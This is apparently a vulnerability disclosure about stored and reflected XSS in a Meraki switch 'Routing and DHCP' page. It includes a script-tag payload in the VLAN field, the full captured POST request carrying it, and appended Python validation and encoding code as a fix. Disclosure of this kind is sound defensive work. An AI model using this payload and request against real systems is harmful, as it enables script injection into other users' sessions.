I have found two XSS vulnerabilities in one simple process of creating a new switch interface.
Below are the details.
- Navigate to “Access Switches Tour” -> “Switch” -> “Configure” -> “Routing and DHCP”.
- Click the “Add an interface” button and fill in “Name”, “Interface IP” and “DHCP server IPs” with arbitrary data. As the VLAN, enter the following payload: 1<script>alert('https://lubi.cz')</script>
- Click the “Save” button. There will be the following POST request:
```
POST /Live-Demo-Switch/n/kaGejdmc/manage/nodes/update_switch_l2_dhcp_relays HTTP/1.1
Host: n140.meraki.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: kMHJ7LD3eYdG+QsNbr9yeJ2a+ZRiEy5g/oaYIu7Tq8k=
X-Requested-With: XMLHttpRequest
Referer: https://n140.meraki.com/Live-Demo-Switch/n/kaGejdmc/manage/configure/switchl3
Content-Length: 232
BAYEUX_BROWSER=bdf2orkeeghvrmlirmbfivj11iq
Connection: close

id=2207616097647&l2_dhcp_relays%5B0%5D%5Bname%5D=XSS&l2_dhcp_relays%5B0%5D%5Bip%5D=1.1.1.3&l2_dhcp_relays%5B0%5D%5Bvlan%5D=1%3Cscript%3Ealert('https%3A%2F%2Flubi.cz')%3C%2Fscript%3E&l2_dhcp_relays%5B0%5D%5Brelay_ips%5D%5B%5D=1.1.1.1
```
Then the JavaScript code will execute (reflected XSS). It is also a stored XSS, so it will fire every time the user navigates to https://n140.meraki.com/Live-Demo-Switch/n/kaGejdmc/manage/configure/switchl3
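
The server-side handling that would have stopped this, as an added example (not part of the original write-up and not Meraki's code): it parses the form body from the request above, rejects a VLAN that is not a plain integer, and HTML-encodes stored values on output. The function names and the 1-4094 VLAN range are assumptions made for the example.

```python
import html
import ipaddress
import re
from urllib.parse import parse_qsl

# Form body copied from the POST request in the write-up above.
CAPTURED_BODY = (
    "id=2207616097647&l2_dhcp_relays%5B0%5D%5Bname%5D=XSS"
    "&l2_dhcp_relays%5B0%5D%5Bip%5D=1.1.1.3"
    "&l2_dhcp_relays%5B0%5D%5Bvlan%5D="
    "1%3Cscript%3Ealert('https%3A%2F%2Flubi.cz')%3C%2Fscript%3E"
    "&l2_dhcp_relays%5B0%5D%5Brelay_ips%5D%5B%5D=1.1.1.1"
)
# Matches l2_dhcp_relays[N][name|ip|vlan] and l2_dhcp_relays[N][relay_ips][].
FIELD = re.compile(r"l2_dhcp_relays\[([0-9]+)\]\[(?:(name|ip|vlan)|relay_ips\]\[)\]")

def parse_relays(body):
    """Group the bracketed form fields into one dict per relay index."""
    relays = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = FIELD.fullmatch(key)
        if m is None:
            continue  # "id" and unknown keys are out of scope here
        entry = relays.setdefault(int(m.group(1)), {"relay_ips": []})
        if m.group(2):
            entry[m.group(2)] = value
        else:
            entry["relay_ips"].append(value)
    return relays

def validate_relay(relay):
    """Return the names of fields that fail allow-list validation."""
    bad = []
    vlan = relay.get("vlan", "")
    # Digits only, then range check (1-4094 is this example's assumption).
    if not re.fullmatch(r"[0-9]{1,4}", vlan) or not 1 <= int(vlan) <= 4094:
        bad.append("vlan")
    for field, values in (("ip", [relay.get("ip", "")]),
                          ("relay_ips", relay["relay_ips"])):
        for v in values:
            try:
                ipaddress.ip_address(v)
            except ValueError:
                bad.append(field)
    return bad

def render_cell(value):
    """HTML-encode a stored value at output time, whatever validation did."""
    return "<td>" + html.escape(value, quote=True) + "</td>"
```

Validation covers the reflected case by refusing the request; encoding in `render_cell` covers the stored case for free-text fields such as the interface name, which cannot be restricted to digits.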